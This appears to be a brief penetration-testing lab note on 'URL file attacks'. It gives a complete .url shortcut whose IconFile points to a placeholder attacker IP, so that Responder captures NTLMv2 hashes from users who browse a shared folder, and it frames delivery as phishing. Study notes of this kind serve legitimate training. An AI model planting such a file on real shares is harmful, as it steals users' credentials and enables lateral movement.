URL File Attacks

PRACTICE ! PRACTICE ! PRACTICE !

Let's imagine we've compromised a user and this user has some sort of shared access, for example a file share access

• We can simply use the responder to capture more hashes to move laterally to a high privileged user

• So inorder for the victim to open our payload, we'll have to craft our own mailicious text file or word document etc - Assume this as a Phishing Attack !

# Save this file in the form of "@something.url" OR "~something.url"

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\<ATTACKER IP>\%USERNAME%.icon
IconIndex=1

Now let's run the responder with the default settings ( SMB and HTTP must be turned on )

• Visiting the Shared access folder "HackMe" => Returns us the fcastle's NTLMv2 hash

NTLMv2 Hash